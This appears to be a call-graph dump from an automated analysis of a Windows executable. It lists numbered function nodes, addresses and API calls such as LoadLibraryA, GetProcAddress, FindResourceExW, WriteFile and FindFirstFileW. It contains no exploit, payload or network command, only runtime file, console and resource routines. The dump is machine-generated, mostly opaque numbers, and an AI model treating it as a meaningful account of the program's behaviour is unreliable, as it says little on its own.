__write 78 API calls 98016->98017 98017->98000 98017->98016 98020 fb1a41 60 API calls __lseeki64_nolock 98017->98020 98017->98022 98018 fb8541 98021 fb0c5d __close_nolock 61 API calls 98018->98021 98019 fb852a 98019->98000 98020->98017 98024 fb8548 98021->98024 98022->98008 98022->98013 98022->98015 98022->98017 98022->98018 98022->98019 98023 fb1a41 60 API calls __lseeki64_nolock 98022->98023 98023->98022 98025 fa8ca8 __mbschr_l 58 API calls 98024->98025 98025->98009 98026->97943 98027->97949 98028->97949 98030 f84ce1 98029->98030 98031 f84d9d LoadLibraryA 98029->98031 98030->97829 98030->97832 98031->98030 98032 f84dae GetProcAddress 98031->98032 98032->98030 98034 f85020 98033->98034 98035 f85003 FindResourceExW 98033->98035 98034->97838 98035->98034 98036 fbdc8c LoadResource 98035->98036 98036->98034 98037 fbdca1 SizeofResource 98036->98037 98037->98034 98038 fbdcb5 LockResource 98037->98038 98038->98034 98040 f85054 98039->98040 98041 fbdd04 98039->98041 98045 fa59bd 98040->98045 98043 f85062 98043->97848 98044->97838 98046 fa59c9 _flsall 98045->98046 98047 fa59db 98046->98047 98048 fa5a01 98046->98048 98058 fa8ca8 58 API calls __getptd_noexit 98047->98058 98060 fa6d8e 98048->98060 98051 fa59e0 98059 fa8f36 9 API calls __mbschr_l 98051->98059 98052 fa5a07 98066 fa592e 83 API calls 5 library calls 98052->98066 98055 fa5a16 98067 fa5a38 LeaveCriticalSection LeaveCriticalSection _fprintf 98055->98067 98057 fa59eb _flsall 98057->98043 98058->98051 98059->98057 98061 fa6d9e 98060->98061 98062 fa6dc0 EnterCriticalSection 98060->98062 98061->98062 98063 fa6da6 98061->98063 98065 fa6db6 98062->98065 98064 fa9d8b __lock 58 API calls 98063->98064 98064->98065 98065->98052 98066->98055 98067->98057 98071 fa576d 98068->98071 98070 f8508e 98070->97857 98072 fa5779 _flsall 98071->98072 98073 fa57bc 98072->98073 98074 fa578f _memset 98072->98074 98083 fa57b4 _flsall 98072->98083 98075 fa6d8e __lock_file 59 API calls 98073->98075 98084 fa8ca8 58 API calls __getptd_noexit 98074->98084 98076 fa57c2 98075->98076 98086 fa558d 72 API calls 6 library calls 98076->98086 98079 fa57a9 98085 fa8f36 9 API calls __mbschr_l 98079->98085 98080 fa57d8 98087 fa57f6 LeaveCriticalSection LeaveCriticalSection _fprintf 98080->98087 98083->98070 98084->98079 98085->98083 98086->98080 98087->98083 98091 fa537a GetSystemTimeAsFileTime 98088->98091 98090 fe9017 98090->97859 98092 fa53a8 __aulldiv 98091->98092 98092->98090 98094 fa5ddc _flsall 98093->98094 98095 fa5dee 98094->98095 98096 fa5e03 98094->98096 98107 fa8ca8 58 API calls __getptd_noexit 98095->98107 98098 fa6d8e __lock_file 59 API calls 98096->98098 98099 fa5e09 98098->98099 98109 fa5a40 67 API calls 6 library calls 98099->98109 98100 fa5df3 98108 fa8f36 9 API calls __mbschr_l 98100->98108 98103 fa5e14 98110 fa5e34 LeaveCriticalSection LeaveCriticalSection _fprintf 98103->98110 98105 fa5e26 98106 fa5dfe _flsall 98105->98106 98106->97864 98107->98100 98108->98106 98109->98103 98110->98105 98112 f880fa _memmove 98111->98112 98113 f880e7 98111->98113 98112->97726 98113->98112 98114 fa0f36 Mailbox 59 API calls 98113->98114 98114->98112 98115->97735 98116->97748 98117->97750 98118->97746 98119->97756 98121 f892c9 Mailbox 98120->98121 98122 fbf4f8 98121->98122 98127 f892d3 98121->98127 98123 fa0f36 Mailbox 59 API calls 98122->98123 98125 fbf504 98123->98125 98124 f892da 98124->97760 98127->98124 98128 f89df0 59 API calls Mailbox 98127->98128 98128->98127 98129->97771 98130->97769 98136 fe97f1 __tzset_nolock _wcscmp 98131->98136 98132 f8506b 74 API calls 98132->98136 98133 fe9685 98133->97777 98133->97805 98134 fe91b2 GetSystemTimeAsFileTime 98134->98136 98135 f85045 85 API calls 98135->98136 98136->98132 98136->98133 98136->98134 98136->98135 98137->97804 98139 fa5522 _flsall 98138->98139 98140 fa554e 98139->98140 98141 fa5536 98139->98141 98143 fa6d8e __lock_file 59 API calls 98140->98143 98148 fa5546 _flsall 98140->98148 98167 fa8ca8 58 API calls __getptd_noexit 98141->98167 98145 fa5560 98143->98145 98144 fa553b 98168 fa8f36 9 API calls __mbschr_l 98144->98168 98151 fa54aa 98145->98151 98148->97808 98152 fa54b9 98151->98152 98153 fa54cd 98151->98153 98213 fa8ca8 58 API calls __getptd_noexit 98152->98213 98159 fa54c9 98153->98159 98170 fa4bad 98153->98170 98155 fa54be 98214 fa8f36 9 API calls __mbschr_l 98155->98214 98169 fa5585 LeaveCriticalSection LeaveCriticalSection _fprintf 98159->98169 98163 fa54e7 98187 fb0b82 98163->98187 98165 fa54ed 98165->98159 98166 fa2ed5 _free 58 API calls 98165->98166 98166->98159 98167->98144 98168->98148 98169->98148 98171 fa4be4 98170->98171 98172 fa4bc0 98170->98172 98176 fb0cf7 98171->98176 98172->98171 98173 fa4856 __stbuf 58 API calls 98172->98173 98174 fa4bdd 98173->98174 98215 fada06 98174->98215 98177 fa54e1 98176->98177 98178 fb0d04 98176->98178 98180 fa4856 98177->98180 98178->98177 98179 fa2ed5 _free 58 API calls 98178->98179 98179->98177 98181 fa4860 98180->98181 98182 fa4875 98180->98182 98350 fa8ca8 58 API calls __getptd_noexit 98181->98350 98182->98163 98184 fa4865 98351 fa8f36 9 API calls __mbschr_l 98184->98351 98186 fa4870 98186->98163 98188 fb0b8e _flsall 98187->98188 98189 fb0b9b 98188->98189 98190 fb0bb2 98188->98190 98367 fa8c74 58 API calls __getptd_noexit 98189->98367 98192 fb0c3d 98190->98192 98195 fb0bc2 98190->98195 98372 fa8c74 58 API calls __getptd_noexit 98192->98372 98194 fb0ba0 98368 fa8ca8 58 API calls __getptd_noexit 98194->98368 98196 fb0bea 98195->98196 98197 fb0be0 98195->98197 98201 fad386 ___lock_fhandle 59 API calls 98196->98201 98369 fa8c74 58 API calls __getptd_noexit 98197->98369 98198 fb0be5 98373 fa8ca8 58 API calls __getptd_noexit 98198->98373 98203 fb0bf0 98201->98203 98205 fb0c0e 98203->98205 98206 fb0c03 98203->98206 98204 fb0c49 98374 fa8f36 9 API calls __mbschr_l 98204->98374 98370 fa8ca8 58 API calls __getptd_noexit 98205->98370 98352 fb0c5d 98206->98352 98209 fb0ba7 _flsall 98209->98165 98211 fb0c09 98371 fb0c35 LeaveCriticalSection __unlock_fhandle 98211->98371 98213->98155 98214->98159 98216 fada12 _flsall 98215->98216 98217 fada1f 98216->98217 98218 fada36 98216->98218 98316 fa8c74 58 API calls __getptd_noexit 98217->98316 98220 fadad5 98218->98220 98222 fada4a 98218->98222 98322 fa8c74 58 API calls __getptd_noexit 98220->98322 98221 fada24 98317 fa8ca8 58 API calls __getptd_noexit 98221->98317 98225 fada68 98222->98225 98226 fada72 98222->98226 98318 fa8c74 58 API calls __getptd_noexit 98225->98318 98243 fad386 98226->98243 98227 fada6d 98323 fa8ca8 58 API calls __getptd_noexit 98227->98323 98230 fada78 98232 fada8b 98230->98232 98233 fada9e 98230->98233 98252 fadaf5 98232->98252 98319 fa8ca8 58 API calls __getptd_noexit 98233->98319 98234 fadae1 98324 fa8f36 9 API calls __mbschr_l 98234->98324 98238 fada2b _flsall 98238->98171 98239 fada97 98321 fadacd LeaveCriticalSection __unlock_fhandle 98239->98321 98240 fadaa3 98320 fa8c74 58 API calls __getptd_noexit 98240->98320 98244 fad392 _flsall 98243->98244 98245 fad3e1 EnterCriticalSection 98244->98245 98246 fa9d8b __lock 58 API calls 98244->98246 98247 fad407 _flsall 98245->98247 98248 fad3b7 98246->98248 98247->98230 98249 fad3cf 98248->98249 98325 fa9fab InitializeCriticalSectionAndSpinCount 98248->98325 98326 fad40b LeaveCriticalSection _doexit 98249->98326 98253 fadb02 __write_nolock 98252->98253 98254 fadb60 98253->98254 98255 fadb41 98253->98255 98286 fadb36 98253->98286 98260 fadbb8 98254->98260 98261 fadb9c 98254->98261 98336 fa8c74 58 API calls __getptd_noexit 98255->98336 98256 fac776 __fltin2 6 API calls 98258 fae356 98256->98258 98258->98239 98259 fadb46 98337 fa8ca8 58 API calls __getptd_noexit 98259->98337 98263 fadbd1 98260->98263 98342 fb1a41 60 API calls 3 library calls 98260->98342 98339 fa8c74 58 API calls __getptd_noexit 98261->98339 98327 fb5deb 98263->98327 98265 fadb4d 98338 fa8f36 9 API calls __mbschr_l 98265->98338 98268 fadba1 98340 fa8ca8 58 API calls __getptd_noexit 98268->98340 98270 fadbdf 98273 fadf38 98270->98273 98343 fa9b2c 58 API calls 2 library calls 98270->98343 98272 fadba8 98341 fa8f36 9 API calls __mbschr_l 98272->98341 98275 fae2cb WriteFile 98273->98275 98276 fadf56 98273->98276 98278 fadf2b GetLastError 98275->98278 98288 fadef8 98275->98288 98279 fae07a 98276->98279 98285 fadf6c 98276->98285 98278->98288 98289 fae16f 98279->98289 98291 fae085 98279->98291 98280 fae304 98280->98286 98348 fa8ca8 58 API calls __getptd_noexit 98280->98348 98281 fadc0b GetConsoleMode 98281->98273 98282 fadc4a 98281->98282 98282->98273 98283 fadc5a GetConsoleCP 98282->98283 98283->98280 98311 fadc89 98283->98311 98284 fadfdb WriteFile 98284->98278 98290 fae018 98284->98290 98285->98280 98285->98284 98286->98256 98288->98280 98288->98286 98293 fae058 98288->98293 98289->98280 98294 fae1e4 WideCharToMultiByte 98289->98294 98290->98285 98295 fae03c 98290->98295 98291->98280 98296 fae0ea WriteFile 98291->98296 98292 fae332 98349 fa8c74 58 API calls __getptd_noexit 98292->98349 98298 fae2fb 98293->98298 98299 fae063 98293->98299 98294->98278 98309 fae22b 98294->98309 98295->98288 98296->98278 98301 fae139 98296->98301 98347 fa8c87 58 API calls 3 library calls 98298->98347 98345 fa8ca8 58 API calls __getptd_noexit 98299->98345 98301->98288 98301->98291 98301->98295 98303 fae233 WriteFile 98307 fae286 GetLastError 98303->98307 98303->98309 98304 fae068 98346 fa8c74 58 API calls __getptd_noexit 98304->98346 98307->98309 98308 fb643a 60 API calls __write_nolock 98308->98311 98309->98288 98309->98289 98309->98295 98309->98303 98310 fb7bde WriteConsoleW CreateFileW __putwch_nolock 98314 fadddf 98310->98314 98311->98288 98311->98308 98312 fadd72 WideCharToMultiByte 98311->98312 98311->98314 98344 fa3775 58 API calls __isleadbyte_l 98311->98344 98312->98288 98313 faddad WriteFile 98312->98313 98313->98278 98313->98314 98314->98278 98314->98288 98314->98310 98314->98311 98315 fade07 WriteFile 98314->98315 98315->98278 98315->98314 98316->98221 98317->98238 98318->98227 98319->98240 98320->98239 98321->98238 98322->98227 98323->98234 98324->98238 98325->98249 98326->98245 98328 fb5e03 98327->98328 98329 fb5df6 98327->98329 98331 fb5e0f 98328->98331 98332 fa8ca8 __mbschr_l 58 API calls 98328->98332 98330 fa8ca8 __mbschr_l 58 API calls 98329->98330 98333 fb5dfb 98330->98333 98331->98270 98334 fb5e30 98332->98334 98333->98270 98335 fa8f36 __mbschr_l 9 API calls 98334->98335 98335->98333 98336->98259 98337->98265 98338->98286 98339->98268 98340->98272 98341->98286 98342->98263 98343->98281 98344->98311 98345->98304 98346->98286 98347->98286 98348->98292 98349->98286 98350->98184 98351->98186 98375 fad643 98352->98375 98354 fb0c6b 98355 fb0cc1 98354->98355 98357 fb0c9f 98354->98357 98359 fad643 __chsize_nolock 58 API calls 98354->98359 98388 fad5bd 59 API calls 2 library calls 98355->98388 98357->98355 98360 fad643 __chsize_nolock 58 API calls 98357->98360 98358 fb0cc9 98361 fb0ceb 98358->98361 98389 fa8c87 58 API calls 3 library calls 98358->98389 98362 fb0c96 98359->98362 98363 fb0cab CloseHandle 98360->98363 98361->98211 98365 fad643 __chsize_nolock 58 API calls 98362->98365 98363->98355 98366 fb0cb7 GetLastError 98363->98366 98365->98357 98366->98355 98367->98194 98368->98209 98369->98198 98370->98211 98371->98209 98372->98198 98373->98204 98374->98209 98376 fad64e 98375->98376 98377 fad663 98375->98377 98390 fa8c74 58 API calls __getptd_noexit 98376->98390 98383 fad688 98377->98383 98392 fa8c74 58 API calls __getptd_noexit 98377->98392 98379 fad653 98391 fa8ca8 58 API calls __getptd_noexit 98379->98391 98381 fad692 98393 fa8ca8 58 API calls __getptd_noexit 98381->98393 98383->98354 98385 fad65b 98385->98354 98386 fad69a 98394 fa8f36 9 API calls __mbschr_l 98386->98394 98388->98358 98389->98361 98390->98379 98391->98385 98392->98381 98393->98386 98394->98385 98396 fb1ac0 __write_nolock 98395->98396 98397 fa091e GetLongPathNameW 98396->98397 98398 f87d2c 59 API calls 98397->98398 98399 f8741d 98398->98399 98400 f8716b 98399->98400 98401 f877c7 59 API calls 98400->98401 98402 f8717d 98401->98402 98403 f848ae 60 API calls 98402->98403 98404 f87188 98403->98404 98405 fbebde 98404->98405 98406 f87193 98404->98406 98412 fbebf8 98405->98412 98453 f87a68 61 API calls 98405->98453 98408 f83f84 59 API calls 98406->98408 98409 f8719f 98408->98409 98447 f834c2 98409->98447 98411 f871b2 Mailbox 98411->97560 98414 f84f3d 136 API calls 98413->98414 98415 f869ef 98414->98415 98416 fbe38a 98415->98416 98418 f84f3d 136 API calls 98415->98418 98417 fe9604 122 API calls 98416->98417 98419 fbe39f 98417->98419 98420 f86a03 98418->98420 98421 fbe3a3 98419->98421 98422 fbe3c0 98419->98422 98420->98416 98423 f86a0b 98420->98423 98426 f84faa 84 API calls 98421->98426 98427 fa0f36 Mailbox 59 API calls 98422->98427 98424 fbe3ab 98423->98424 98425 f86a17 98423->98425 98563 fe4339 90 API calls _wprintf 98424->98563 98454 f86bec 98425->98454 98426->98424 98446 fbe405 Mailbox 98427->98446 98431 fbe3b9 98431->98422 98432 fbe5b9 98433 fa2ed5 _free 58 API calls 98432->98433 98434 fbe5c1 98433->98434 98435 f84faa 84 API calls 98434->98435 98440 fbe5ca 98435->98440 98439 fa2ed5 _free 58 API calls 98439->98440 98440->98439 98441 f84faa 84 API calls 98440->98441 98566 fdfad2 89 API calls 4 library calls 98440->98566 98441->98440 98443 f87f41 59 API calls 98443->98446 98446->98432 98446->98440 98446->98443 98546 fdfa6e 98446->98546 98549 f8766f 98446->98549 98557 f874bd 98446->98557 98564 fdf98f 61 API calls 2 library calls 98446->98564 98565 fe7428 59 API calls Mailbox 98446->98565 98448 f834d4 98447->98448 98452 f834f3 _memmove 98447->98452 98450 fa0f36 Mailbox 59 API calls 98448->98450 98449 fa0f36 Mailbox 59 API calls 98451 f8350a 98449->98451 98450->98452 98451->98411 98452->98449 98453->98405 98455 fbe777 98454->98455 98456 f86c15 98454->98456 98639 fdfad2 89 API calls 4 library calls 98455->98639 98572 f85906 60 API calls Mailbox 98456->98572 98459 f86c37 98573 f85956 67 API calls 98459->98573 98460 fbe78a 98640 fdfad2 89 API calls 4 library calls 98460->98640 98462 f86c4c 98462->98460 98463 f86c54 98462->98463 98465 f877c7 59 API calls 98463->98465 98467 f86c60 98465->98467 98466 fbe7a6 98469 f86cc1 98466->98469 98574 fa0ad7 60 API calls __write_nolock 98467->98574 98471 fbe7b9 98469->98471 98472 f86ccf 98469->98472 98470 f86c6c 98474 f877c7 59 API calls 98470->98474 98475 f85dcf CloseHandle 98471->98475 98473 f877c7 59 API calls 98472->98473 98476 f86cd8 98473->98476 98477 f86c78 98474->98477 98478 fbe7c5 98475->98478 98480 f877c7 59 API calls 98476->98480 98481 f848ae 60 API calls 98477->98481 98479 f84f3d 136 API calls 98478->98479 98482 fbe7e1 98479->98482 98483 f86ce1 98480->98483 98484 f86c86 98481->98484 98485 fbe80a 98482->98485 98488 fe9604 122 API calls 98482->98488 98577 f846f9 98483->98577 98575 f859b0 ReadFile SetFilePointerEx 98484->98575 98641 fdfad2 89 API calls 4 library calls 98485->98641 98492 fbe7fd 98488->98492 98489 f86cf8 98493 f87c8e 59 API calls 98489->98493 98491 f86cb2 98576 f85c4e SetFilePointerEx SetFilePointerEx 98491->98576 98495 fbe826 98492->98495 98496 fbe805 98492->98496 98497 f86d09 SetCurrentDirectoryW 98493->98497 98499 f84faa 84 API calls 98495->98499 98498 f84faa 84 API calls 98496->98498 98503 f86d1c Mailbox 98497->98503 98498->98485 98501 fbe82b 98499->98501 98500 f86e6c Mailbox 98567 f85934 98500->98567 98502 fa0f36 Mailbox 59 API calls 98501->98502 98504 fbe85f 98502->98504 98506 fa0f36 Mailbox 59 API calls 98503->98506 98510 f8766f 59 API calls 98504->98510 98508 f86d2f 98506->98508 98507 f83bcd 98507->97427 98507->97453 98509 f8538e 59 API calls 98508->98509 98535 f86d3a Mailbox __NMSG_WRITE 98509->98535 98543 fbe8a8 Mailbox 98510->98543 98511 f86e47 98635 f85dcf 98511->98635 98514 fbea99 98645 fe7388 59 API calls Mailbox 98514->98645 98515 f86e53 SetCurrentDirectoryW 98515->98500 98518 fbeabb 98646 fef656 59 API calls 2 library calls 98518->98646 98521 fbeac8 98523 fa2ed5 _free 58 API calls 98521->98523 98522 fbeb32 98649 fdfad2 89 API calls 4 library calls 98522->98649 98523->98500 98526 fbeb4b 98526->98511 98527 f8766f 59 API calls 98527->98543 98529 fbeb2a 98648 fdf928 59 API calls 4 library calls 98529->98648 98531 f87f41 59 API calls 98531->98535 98534 fdfa6e 59 API calls 98534->98543 98535->98511 98535->98522 98535->98529 98535->98531 98628 f859cd 67 API calls _wcscpy 98535->98628 98629 f870bd GetStringTypeW 98535->98629 98630 f8702c 60 API calls __wcsnicmp 98535->98630 98631 f8710a GetStringTypeW __NMSG_WRITE 98535->98631 98632 fa37bd GetStringTypeW _iswctype 98535->98632 98633 f86a3c 165 API calls 3 library calls 98535->98633 98634 f87373 59 API calls Mailbox 98535->98634 98536 f87f41 59 API calls 98536->98543 98539 fbeaeb 98647 fdfad2 89 API calls 4 library calls 98539->98647 98542 fbeb04 98544 fa2ed5 _free 58 API calls 98542->98544 98543->98514 98543->98527 98543->98534 98543->98536 98543->98539 98642 fdf98f 61 API calls 2 library calls 98543->98642 98643 fe7428 59 API calls Mailbox 98543->98643 98644 f87373 59 API calls Mailbox 98543->98644 98545 fbe821 98544->98545 98545->98500 98547 fa0f36 Mailbox 59 API calls 98546->98547 98548 fdfa9e _memmove 98547->98548 98548->98446 98550 f8770f 98549->98550 98554 f87682 _memmove 98549->98554 98552 fa0f36 Mailbox 59 API calls 98550->98552 98551 fa0f36 Mailbox 59 API calls 98553 f87689 98551->98553 98552->98554 98555 fa0f36 Mailbox 59 API calls 98553->98555 98556 f876b2 98553->98556 98554->98551 98555->98556 98556->98446 98558 f874d0 98557->98558 98561 f8757e 98557->98561 98559 fa0f36 Mailbox 59 API calls 98558->98559 98560 f87502 98558->98560 98559->98560 98560->98561 98562 fa0f36 59 API calls Mailbox 98560->98562 98561->98446 98562->98560 98563->98431 98564->98446 98565->98446 98566->98440 98568 f85dcf CloseHandle 98567->98568 98569 f8593c Mailbox 98568->98569 98570 f85dcf CloseHandle 98569->98570 98571 f8594b 98570->98571 98571->98507 98572->98459 98573->98462 98574->98470 98575->98491 98576->98469 98578 f877c7 59 API calls 98577->98578 98579 f8470f 98578->98579 98580 f877c7 59 API calls 98579->98580 98581 f84717 98580->98581 98582 f877c7 59 API calls 98581->98582 98583 f8471f 98582->98583 98584 f877c7 59 API calls 98583->98584 98585 f84727 98584->98585 98586 fbd82b 98585->98586 98587 f8475b 98585->98587 98588 f881a7 59 API calls 98586->98588 98589 f879ab 59 API calls 98587->98589 98590 fbd834 98588->98590 98591 f84769 98589->98591 98592 f87eec 59 API calls 98590->98592 98593 f87e8c 59 API calls 98591->98593 98595 f8479e 98592->98595 98594 f84773 98593->98594 98594->98595 98596 f879ab 59 API calls 98594->98596 98598 f847bd 98595->98598 98613 f847de 98595->98613 98615 fbd854 98595->98615 98599 f84794 98596->98599 98602 f87b52 59 API calls 98598->98602 98601 f87e8c 59 API calls 98599->98601 98600 fbd924 98605 f87d2c 59 API calls 98600->98605 98601->98595 98606 f847c7 98602->98606 98603 f84801 98608 f84811 98603->98608 98610 f881a7 59 API calls 98603->98610 98604 f847ef 98604->98603 98607 f881a7 59 API calls 98604->98607 98623 fbd8e1 98605->98623 98609 f879ab 59 API calls 98606->98609 98606->98613 98607->98603 98612 f84818 98608->98612 98614 f881a7 59 API calls 98608->98614 98609->98613 98610->98608 98611 fbd90d 98611->98600 98618 fbd8f8 98611->98618 98616 f881a7 59 API calls 98612->98616 98625 f8481f Mailbox 98612->98625 98650 f879ab 98613->98650 98614->98612 98615->98600 98615->98611 98622 fbd88b 98615->98622 98616->98625 98617 f87b52 59 API calls 98617->98623 98620 f87d2c 59 API calls 98618->98620 98619 fbd8e9 98621 f87d2c 59 API calls 98619->98621 98620->98623 98621->98623 98622->98619 98626 fbd8d4 98622->98626 98623->98613 98623->98617 98663 f87a84 59 API calls 2 library calls 98623->98663 98625->98489 98627 f87d2c 59 API calls 98626->98627 98627->98623 98628->98535 98629->98535 98630->98535 98631->98535 98632->98535 98633->98535 98634->98535 98636 f85de8 98635->98636 98637 f85dd9 98635->98637 98636->98637 98638 f85ded CloseHandle 98636->98638 98637->98515 98638->98637 98639->98460 98640->98466 98641->98545 98642->98543 98643->98543 98644->98543 98645->98518 98646->98521 98647->98542 98648->98522 98649->98526 98651 f879ba 98650->98651 98652 f87a17 98650->98652 98651->98652 98653 f879c5 98651->98653 98654 f87e8c 59 API calls 98652->98654 98655 f879e0 98653->98655 98656 fbee62 98653->98656 98660 f879e8 _memmove 98654->98660 98664 f88087 59 API calls Mailbox 98655->98664 98657 f88189 59 API calls 98656->98657 98659 fbee6c 98657->98659 98661 fa0f36 Mailbox 59 API calls 98659->98661 98660->98604 98662 fbee8c 98661->98662 98663->98623 98664->98660 98666 f87009 98665->98666 98667 f86ef5 98665->98667 98666->97566 98667->98666 98668 fa0f36 Mailbox 59 API calls 98667->98668 98670 f86f1c 98668->98670 98669 fa0f36 Mailbox 59 API calls 98671 f86f91 98669->98671 98670->98669 98671->98666 98674 f874bd 59 API calls 98671->98674 98675 f8766f 59 API calls 98671->98675 98678 f863a0 94 API calls 2 library calls 98671->98678 98679 fd68a9 59 API calls Mailbox 98671->98679 98674->98671 98675->98671 98676->97569 98677->97571 98678->98671 98679->98671 98680->97584 98681->97585 98683 fbd568 98682->98683 98684 f84227 98682->98684 98683->98684 98685 fbd571 DestroyIcon 98683->98685 98684->97592 98708 fe302e 62 API calls _W_store_winword 98684->98708 98685->98684 98687 f84129 98686->98687 98707 f84200 Mailbox 98686->98707 98709 f87b76 98687->98709 98707->97597 98708->97592 98710 fa0f36 Mailbox 59 API calls 98709->98710 98711 f87b9b 98710->98711 98712 f88189 59 API calls 98711->98712 98713 f84137 98712->98713 98715 f8e59d 98714->98715 98716 f8e5b1 98714->98716 98889 f8e060 341 API calls 2 library calls 98715->98889 98890 fe9ed4 89 API calls 4 library calls 98716->98890 98719 f8e5a8 98719->97644 98720 fc3dfd 98720->98720 98722 f8e835 98721->98722 98723 fc3e02 98722->98723 98726 f8e89f 98722->98726 98735 f8e8f9 98722->98735 98891 f8a000 98723->98891 98725 fc3e17 98751 f8ead0 Mailbox 98725->98751 98914 fe9ed4 89 API calls 4 library calls 98725->98914 98729 f877c7 59 API calls 98726->98729 98726->98735 98727 f877c7 59 API calls 98727->98735 98731 fc3e5d 98729->98731 98730 fa2ec0 __cinit 67 API calls 98730->98735 98733 fa2ec0 __cinit 67 API calls 98731->98733 98732 fc3e7f 98732->97644 98733->98735 98734 f88620 69 API calls 98734->98751 98735->98727 98735->98730 98735->98732 98738 f8eaba 98735->98738 98735->98751 98736 f8a000 341 API calls 98736->98751 98738->98751 98915 fe9ed4 89 API calls 4 library calls 98738->98915 98739 fe9ed4 89 API calls 98739->98751 98742 f8f2f5 98919 fe9ed4 89 API calls 4 library calls 98742->98919 98744 fc417e 98744->97644 98745 f88ea0 59 API calls 98745->98751 98748 f880d7 59 API calls 98748->98751 98750 f8ebd8 98750->97644 98751->98734 98751->98736 98751->98739 98751->98742 98751->98745 98751->98748 98751->98750 98916 fd71e5 59 API calls 98751->98916 98917 ffc6d7 341 API calls 98751->98917 98918 ffb651 341 API calls Mailbox 98751->98918 98920 f89df0 59 API calls Mailbox 98751->98920 98921 ff94db 341 API calls Mailbox 98751->98921 98753 f8f61a 98752->98753 98754 f8f7b0 98752->98754 98756 fc4777 98753->98756 98757 f8f626 98753->98757 98755 f87f41 59 API calls 98754->98755 98763 f8f6ec Mailbox 98755->98763 99016 ffbd80 98756->99016 99014 f8f3f0 341 API calls 2 library calls 98757->99014 98760 fc4785 98764 f8f790 98760->98764 99056 fe9ed4 89 API calls 4 library calls 98760->99056 98762 f8f65d 98762->98760 98762->98763 98762->98764 98767 f84faa 84 API calls 98763->98767 98928 fecc06 98763->98928 99008 fe3c7b 98763->99008 99011 ffe037 98763->99011 98764->97644 98766 f8f743 98766->98764 99015 f89df0 59 API calls Mailbox 98766->99015 98767->98766 99311 f882e0 98771->99311 98773 f8fe9d 98775 fc4a86 98773->98775 98834 f90856 98773->98834 99316 f8f394 98773->99316 99333 fe9ed4 89 API calls 4 library calls 98775->99333 98778 f8ff9e 98783 f8ffac 98778->98783 98809 fc4be6 98778->98809 99337 fd6a42 59 API calls 2 library calls 98778->99337 98779 f8ff33 98779->98778 98780 f90677 98779->98780 98785 fc4aae 98779->98785 98801 fa0f36 59 API calls Mailbox 98779->98801 98812 fc4a9b 98779->98812 98815 f8a000 341 API calls 98779->98815 98825 fc4b65 98779->98825 98829 f906a5 _memmove 98779->98829 98789 fa0f36 Mailbox 59 API calls 98780->98789 98799 fc4b30 98785->98799 99334 f8f803 341 API calls 98785->99334 98786 fc4ba1 98789->98829 98799->98812 99335 fe9ed4 89 API calls 4 library calls 98799->99335 98801->98779 98804 fa0f36 Mailbox 59 API calls 98809->98783 98809->98812 98815->98779 99336 fe9ed4 89 API calls 4 library calls 98825->99336 98829->98804 99332 fe9ed4 89 API calls 4 library calls 98834->99332 98851->97644 98852->97604 98853->97609 98854->97644 98855->97613 98856->97613 98857->97613 98858->97644 98859->97644 98860->97644 98862 f899b1 98861->98862 98871 f899ab 98861->98871 98863 fbf92c __i64tow 98862->98863 98864 f899f9 98862->98864 98866 f899b7 __itow 98862->98866 98869 fbf833 98862->98869 99353 fa3818 83 API calls 3 library calls 98864->99353 98868 fa0f36 Mailbox 59 API calls 98866->98868 98870 f899d1 98868->98870 98872 fa0f36 Mailbox 59 API calls 98869->98872 98877 fbf8ab Mailbox _wcscpy 98869->98877 98870->98871 98873 f87f41 59 API calls 98870->98873 98871->97644 98875 fbf878 98872->98875 98873->98871 98874 fa0f36 Mailbox 59 API calls 98876 fbf89e 98874->98876 98875->98874 98876->98877 98878 f87f41 59 API calls 98876->98878 99354 fa3818 83 API calls 3 library calls 98877->99354 98878->98877 98879->97644 98880->97644 98881->97644 98882->97647 98883->97647 98884->97647 98885->97647 98886->97647 98887->97647 98888->97647 98889->98719 98890->98720 98892 f8a01f 98891->98892 98909 f8a04d Mailbox 98891->98909 98893 fa0f36 Mailbox 59 API calls 98892->98893 98893->98909 98894 fa2ec0 67 API calls __cinit 98894->98909 98895 f8b5d5 98896 f881a7 59 API calls 98895->98896 98908 f8a1b7 98896->98908 98897 f877c7 59 API calls 98897->98909 98898 fa0f36 59 API calls Mailbox 98898->98909 98902 fc03ae 98924 fe9ed4 89 API calls 4 library calls 98902->98924 98905 f881a7 59 API calls 98905->98909 98906 fd71e5 59 API calls 98906->98909 98907 fc03bd 98907->98725 98908->98725 98909->98894 98909->98895 98909->98897 98909->98898 98909->98902 98909->98905 98909->98906 98909->98908 98910 fc0d2f 98909->98910 98912 f8a6ba 98909->98912 98913 f8b5da 98909->98913 98922 f8ca20 341 API calls 2 library calls 98909->98922 98923 f8ba60 60 API calls Mailbox 98909->98923 98926 fe9ed4 89 API calls 4 library calls 98910->98926 98925 fe9ed4 89 API calls 4 library calls 98912->98925 98927 fe9ed4 89 API calls 4 library calls 98913->98927 98914->98751 98915->98751 98916->98751 98917->98751 98918->98751 98919->98744 98920->98751 98921->98751 98922->98909 98923->98909 98924->98907 98925->98908 98926->98913 98927->98908 98929 f877c7 59 API calls 98928->98929 98930 fecc3b 98929->98930 98931 f877c7 59 API calls 98930->98931 98932 fecc44 98931->98932 98933 fecc58 98932->98933 99166 f89c9c 59 API calls 98932->99166 98935 f89997 84 API calls 98933->98935 99209 fe449b GetFileAttributesW 99008->99209 99213 ffcbf1 99011->99213 99013 ffe047 99013->98766 99014->98762 99015->98766 99017 ffbdab 99016->99017 99018 ffbdc5 99016->99018 99303 fe9ed4 89 API calls 4 library calls 99017->99303 99304 ffa328 59 API calls Mailbox 99018->99304 99021 ffbdd0 99022 f8a000 340 API calls 99021->99022 99023 ffbe31 99022->99023 99024 ffbec3 99023->99024 99027 ffbe72 99023->99027 99049 ffbdbd Mailbox 99023->99049 99025 ffbf19 99024->99025 99026 ffbec9 99024->99026 99025->99049 99305 fe7388 59 API calls Mailbox 99027->99305 99049->98760 99056->98764 99166->98933 99210 fe3c82 99209->99210 99211 fe44b6 FindFirstFileW 99209->99211 99210->98766 99211->99210 99212 fe44cb FindClose 99211->99212 99212->99210 99214 f89997 84 API calls 99213->99214 99215 ffcc2e 99214->99215 99220 ffcc75 Mailbox 99215->99220 99251 ffd8b9 99215->99251 99220->99013 99252 f87faf 59 API calls 99251->99252 99303->99049 99304->99021 99312 f882ef 99311->99312 99315 f8830a 99311->99315 99313 f87faf 59 API calls 99312->99313 99314 f882f7 CharUpperBuffW 99313->99314 99314->99315 99315->98773 99318 f8f3b1 99316->99318 99317 f8f3d2 99317->98779 99318->99317 99351 fe9ed4 89 API calls 4 library calls 99318->99351 99332->98775 99333->98812 99334->98799 99335->98812 99336->98812 99337->98786 